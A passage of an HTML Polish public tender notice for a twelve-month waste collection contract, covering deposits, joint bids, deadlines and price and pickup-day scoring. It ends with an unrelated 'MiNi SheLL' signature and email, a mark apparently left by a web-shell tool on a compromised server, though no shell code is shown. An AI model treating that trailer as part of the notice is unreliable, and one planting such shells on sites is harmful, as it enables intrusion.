albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 1.	Wykonawca zobowiązany jest do zabezpieczenia swojej oferty wadium w wysokości: <br/>a)	Część I - 2 000,00 zł (słownie złotych: dwa tysiące 00/100)<br/>b)	Część II - 500,00 zł (pięćset złotych 00/100)<br/>2.	Wadium wnosi się przed upływem terminu składania ofert.<br/>3.	Wadium może być wnoszone według wyboru wykonawcy w jednej lub kilku następujących formach:<br/>1)	pieniądzu<br/>2)	gwarancjach bankowych<br/>3)	gwarancjach ubezpieczeniowych<br/>4)	poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości.<br/>4.	Wadium wnoszone w pieniądzu należy wpłacić przelewem na rachunek bankowy Zamawiającego numer: 02 8369 0008 7109 1835 2000 0060 z dopiskiem: „Wadium – odpady, część …” lub „Wadium - DO.3300.1.2024, część …..”<br/>Za datę zapłaty wadium uznaje się moment wpływu na konto zamawiającego.<br/>Pozostałe wymagania dotyczące wadium zostało opisane w rozdziale XVI SWZ. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu albo do reprezentowania i zawarcia umowy w sprawie zamówienia publicznego. Pełnomocnictwo winno być załączone do oferty.<br/>2. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, oświadczenie wstępne, o którym mowa w Rozdziale X ust. 1 SWZ składa wraz z ofertą każdy z Wykonawców - załącznik nr 2.1 do SWZ (część I) i/lub załącznik nr 2.2 do SWZ (część II). Oświadczenie to potwierdza odpowiednio brak podstaw wykluczenia oraz spełnianie warunków udziału w zakresie, w jakim każdy z Wykonawców wykazuje spełnianie warunków udziału w postępowaniu.<br/>3. Oświadczenia i dokumenty, inne niż oświadczenie, o którym mowa w Rozdziale X ust.1 SWZ potwierdzające brak podstaw do wykluczenia z postępowania, składa na wezwanie Zamawiającego każdy z Wykonawców wspólnie ubiegających się o zamówienie.<br/>4. Wszelka korespondencja będzie prowadzona przez zamawiającego wyłącznie z pełnomocnikiem wykonawców wspólnie ubiegających się o zamówienie.<br/>5. Wspólne ubieganie się wykonawców o udzielenie zamówienia zostało uregulowane w art. 58-60 ustawy p.z.p.<br/>6.	Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty oświadczenie, z którego wynika, które usługi wykonają poszczególni wykonawcy (Załącznik nr 6.1 do SWZ – część I i/lub Załącznik nr 6.2 do SWZ – część II). <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1.	Wybrany Wykonawca jest zobowiązany do zawarcia umowy w sprawie zamówienia publicznego na warunkach określonych we Wzorze Umowy, stanowiącym załącznik nr 7.1 (część I) i/lub załącznik nr 7.2 (część II) do SWZ.<br/>2.	Zakres świadczenia Wykonawcy wynikający z umowy jest tożsamy z jego zobowiązaniem zawartym w ofercie.<br/>3.	Zamawiający przewiduje możliwość zmiany zawartej umowy w stosunku do treści wybranej oferty w zakresie uregulowanym w art. 454-455 p.z.p oraz w §9 Wzorze Umowy, stanowiącym załącznik nr 7.1 (część I) i/lub załącznik nr 7.2 (część II) do SWZ. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2024-11-21 13:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Platforma e-Zamówienia: https://ezamowienia.gov.pl/pl/</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2024-11-21 14:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2024-12-20</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> 1. Szczegółowe dane dotyczące kryteriów oceny:<br/>Zamawiający porówna i oceni oferty niepodlegające odrzuceniu, w każdej części zamówienia z osobna.<br/>2. Kryteria oceny oferty dla obu części zamówienia są takie same.<br/>3.	Przy wyborze najkorzystniejszej oferty Zamawiający będzie się kierował następującymi kryteriami oceny ofert:<br/>	Kryterium „Cena Oferty” - waga kryterium 60 % (punkty - 60);<br/>	Kryterium „Deklaracja dodatkowego terminu odbioru odpadów” - waga kryterium 40% (punkty - 40).<br/>4.	Maksymalna liczba punktów w danym kryterium równa jest określonej wadze kryterium <br/>w %.<br/>5.	Oferty oceniane będą punktowo.<br/>6.	Przyznawanie liczby punków poszczególnym ofertom dla każdej części, będzie się odbywać wg następujących zasad: <br/>1)	Kryterium &#34;Cena oferty&#34;<br/>Ocenie zostanie poddana cena oferty brutto podana przez Wykonawcę w części B Formularza ofertowego (Załącznik nr 1.1 (część I) i/lub Załącznik nr 1.2 (część II) do SWZ). W zakresie kryterium „Cena oferty” oferta może uzyskać maksymalnie 60 punktów.<br/>Liczba punktów, którą można uzyskać w kryterium „Cena oferty”, zostanie obliczona wg wzoru: <br/>C =	Cmin	x 60<br/> ————	<br/>	Cbad	<br/>gdzie:<br/>C – oznacza liczbę otrzymanych punktów przez daną ofertę w kryterium cena oferty,<br/>Cmin – oznacza najniższą cenę brutto oferty spośród badanych ofert niepodlegających odrzuceniu,<br/>Cbad – oznacza cenę brutto badanej oferty;<br/>2)	Kryterium „Deklaracja dodatkowego terminu odbioru odpadów”<br/>W ramach kryterium „Deklaracja dodatkowego terminu odbioru odpadów” oceniana będzie zaoferowana w części C Formularza ofertowego (Załącznik nr 1.1 (część I) i/lub Załącznik nr 1.2 (część II) do SWZ) dodatkowa ilość dni w ciągu trwania umowy (oprócz obowiązkowych odbiorów wskazanych w rozdziale IV ust. 2 SWZ tj. raz w tygodniu) w taki sposób, że: <br/>•	w przypadku braku deklaracji dodatkowego terminu odbioru odpadów (0 dni dodatkowych) - Wykonawca otrzyma 0 pkt;<br/>•	w przypadku zadeklarowania 3 dodatkowych dni odbioru w ciągu trwania umowy – Wykonawca otrzyma 10 pkt<br/>•	w przypadku zadeklarowania 6 dodatkowych dni odbioru w ciągu trwania umowy – Wykonawca otrzyma 20 pkt<br/>•	w przypadku zadeklarowania 9 dodatkowych dni odbioru w ciągu trwania umowy – Wykonawca otrzyma 30 pkt<br/>•	w przypadku zadeklarowania 12 dodatkowych dni odbioru w ciągu trwania umowy – Wykonawca otrzyma 40 pkt<br/>Brak zaznaczenia którejkolwiek z pozycji zostanie uznane za brak deklaracji dodatkowych dni odbioru odpadów, wówczas ofercie zostanie przyznanie 0 pkt w tym kryterium. Zaznaczenie dwóch i więcej pozycji będzie skutkowało odrzuceniem oferty jako niezgodnej z warunkami zamówienia.<br/>W przypadku zaoferowania dodatkowych dni odbioru Wykonawca deklaruje, że dokona odbioru najpóźniej w ciągu 48 godzin od telefonicznego zgłoszenia przez Zamawiającego na zwiększone zapotrzebowanie na usługę odbioru odpadów.<br/>Maksymalna ilość punktów, jaką można uzyskać w tym kryterium wynosi 40 pkt.<br/>7.	Oferty będą oceniane dla każdego kryterium oddzielnie. O wyborze najkorzystniejszej oferty zdecyduje większa liczba zdobytych punktów łącznie we wszystkich kryteriach oceny. <br/>Łączna ilość punktów = „Cena oferty” + „Deklaracja dodatkowego terminu odbioru odpadów”<br/><br/>2. Szczegółowe dane dotyczące terminu realizacji:<br/>Zamówienie należy zrealizować w terminie 12 miesięcy licząc od dnia 01.01.2025 r. W przypadku podpisania umowy po dacie 01.01.2025 r. termin będzie liczony od dnia podpisania umowy, jednak nie dłużej niż do 31.12.2025 r.

Creat By MiNi SheLL
Email: jattceo@gmail.com